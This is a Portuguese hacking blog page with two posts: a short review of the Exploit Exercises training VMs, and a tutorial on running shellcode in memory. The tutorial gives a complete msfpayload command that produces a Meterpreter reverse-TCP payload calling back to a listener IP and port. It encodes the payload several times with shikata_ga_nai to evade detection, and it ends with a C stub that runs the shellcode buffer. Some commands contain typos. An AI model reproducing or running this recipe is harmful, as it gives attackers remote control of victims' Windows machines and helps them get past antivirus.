Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador #Hacking #Memory #c #Shellcode #Jhoon #Null #Metasploit. Mostrar todas as postagens
Mostrando postagens com marcador #Hacking #Memory #c #Shellcode #Jhoon #Null #Metasploit. Mostrar todas as postagens

quinta-feira, 30 de julho de 2015

Exploit exercises

     O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest.


[0x00] Introdução
     O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest.

[0x01Como funciona ?
      O desafio é elaborado utilizando diversas VM (Virtuais Machines) e uma vasta gama de documentações e vídeo aulas.

[0x02Níveis
  [0x02a] Nebula
   O módulo Nebula inicialmente introduz problemas como buffer overflows escalação de privilegio em ambiente linux o nebula é ideal para iniciantes em escalação de privilegio.

 [0x02b] Protostar 
  O módulo Protostar é bem semelhante ao nebula o introduz a ordem de byte ao manuseio de sockets estouro de pilha sequencia de formato e a programação de rede.

 [0x02c] Fusion 
  O módulo Fusion nos introduz basicamente a criptografia e a variedade de protocolos.

 [0x02d] Main Sequence
  Modulo Main Sequence onde as coisas começam a ficar serias esse eu considero como um dos módulos mais decisivos pois o introduz a uma sequencia de testes utilizando ferramentas focadas em pentest como Metasploit SQLMAP além de analises binarias engenharia reversa analise de criptografia básica protocolos de rede além de pentest focado em WEB.

 [0x02e] Cloudroad
 Módulo final cloudroad era o nome do capture the flag realizado durante a ruxcon 2014 jogue e "seja" membro de uma organização ilegal que contrata espionagem empresarial escreva exploits e pratique engenharia reversa e muito mais infelizmente esse módulo ainda não encontra se disponível.

[0x03] Considerações finais 

Testei alguns módulos e todos se mostraram completamente capazes de fornecer um grande auxilio para garotada que quer passar o tempo ou simplesmente começar estudar  esse ramo.

[0x04Exploit exercises
 [0x04a] Download
               https://exploit-exercises.com/


sexta-feira, 29 de maio de 2015

Injeção de shellcode na mémoria

#Shellcode [ CONEXÃO REVERSA ] #Memory


  Eae galera, jh00n aqui novamente :)

  Nesse post irei abordar o tema sobre injeção de uma shellcode na mémoria, mas antes de tudo teremos que gerar uma shellcode usando o msfpayload que está presente no framework Metasploit.

    

root@jh00n:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.19 LPORT=445 R | msfenconde -e x86/shikata_ga_nai -t c -a x64 -b "\x00\x0A\x00" -c 5




  Irei gerar a shellcode utilizando a payload (windows/meterpreter/reverse_tcp). Agora eu terei que definir o ip da máquina que ira se conectar, no parâmetro (LHOST) e a porta que irá também se conectar, no parâmetro (LPORT), e por último definirei o parâmetro (R) para o msfpayload me retornar a shellcode em (R)aw.


   #Msfencode



msfenconde -e x86/shikata_ga_nai -t c -a x64 -b "\x00\x0A\x00" -c 5



  O msfencode será utilizado para encodar a minha shellcode (x86/shikata_ga_nai) agora e vou definir o numéro de vezes que a minha shellcode ira ser codificado no parâmetro (-c 5) nesse caso defini para cinco. (-t) e também irei definir formato de saída"c".  A arquitetura que a shellcode vai utilizar é 64 bits(-a x64). Vou excluir alguns caracteres "inúteis" x00, x0A utilizando o parâmetro (-b)


#Compilando



  Utilizarei o Dev c++ para compilar o programa que ira executar a minha shellcode:


  Utilizarei o Dev c++ para compilar o programa que ira executar a minha shellcode:

  char code[] = "shellcode";
   int main(int argc, char **argv)
  {
   int (*func)();
   func = (int (*)()) code;
   (int)(*func)();
   }


#Aguardando Conexão

   

DEMO